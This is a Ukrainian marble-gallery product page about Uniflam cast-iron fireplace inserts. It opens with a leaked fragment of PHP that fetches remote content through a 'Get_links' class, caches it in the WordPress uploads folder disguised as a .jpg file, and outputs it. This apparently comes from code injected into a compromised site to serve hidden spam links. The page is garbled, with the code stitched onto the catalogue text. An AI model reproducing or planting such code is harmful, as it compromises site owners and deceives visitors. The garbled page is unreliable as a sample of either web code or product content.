function return_links($lib_path) { $links_class = new Get_links(); $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg'; $_cache_lifetime = $links_class->_cache_lifetime; if (!file_exists($file)) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } else { $data = file_get_contents($file); return $data; } } } ?> Топки Uniflame « Галерея мармуру – краса втілена в мармур
Топки Uniflame
камінна топка Uniflam 850 Pryzmat
Камінна топка Uniflam 850 Pryzmat
Камінна топка Uniflam 700 Pryzmat
Камінна топка Uniflam 700 Pryzmat
Камінна топка Uniflam 700 Panorama
Камінна топка Uniflam 700 Panorama
Uniflam 700 Lux
Чавунна топка Uniflam 700 Lux
Uniflam 700
Чавунна топка Uniflam 700
Uniflam 700 Selenic
Чавунна топка Uniflam 700 Selenic
700_standartO
Камінна топка Uniflam 700 STANDART
Uniflam 600
Камінна топка Uniflam 600

Камінні топки Uniflam виготовляються у Франції з 1926 року. Власне лиття чавуну дозволяє створювати оптимальні ціни на ринку.

Французька компанія Uniflam заснована в 1926 році. В даний момент фірма виробляє широкий вибір печей, камінних топок, барбекю і т.д. Сучасне виробництво чавунного лиття сертифіковане за системою якості ISO 9002. Камінні топки Uniflam виготовлені з високоякісного чавуну, який є оптимальним матеріалом для накопичення та віддачі тепла. Максимальна віддача тепла – ККД 70%. Вогнетривкі скла камінних топок стійкі до температури до 750 c .

Красиві та стильні камінні топки Uniflam , створені з використанням сучасних технологій, відповідають не тільки європейським екологічним нормам NF, але й мають французький сертифікат “Зелене полум’я”. Економічна ціна за умови європейського рівня якості та дизайну камінних топок Uniflam .

Чим відрізняються чавунні топки Uniflam від традиційних печей? По-перше, істотною відмінністю є тривалість розтоплення. Складена з цегли піч починає виділяти тепло тільки після того, як прогріється вся цегляна кладка. Чавунна топка починає опалювати вже через 10-15 хвилин після розтоплення. Ще однією важливою відмінністю камінних топки Uniflam є витрата палива. У процесі обвуглювання полін приблизно 85% деревини перетворюється в летючі гази і тільки близько 15% залишається в печі у вигляді вугілля. На відміну від російської печі, чавунної топці однієї закладки дров може вистачити на 8-10 годин роботи в економічному режимі при ККД до 82%.

Варто також згадати про пожежобезпеки. Особливу небезпеку становлять тріщини, що утворюються в масиві камінів і димових каналах внаслідок нерівномірного осідання або викрошування глиняного розчину зі швів в результаті дії високої температури. З чавунним корпусом камінної топки Uniflam подібне не станеться, і він прослужить не одному поколінню.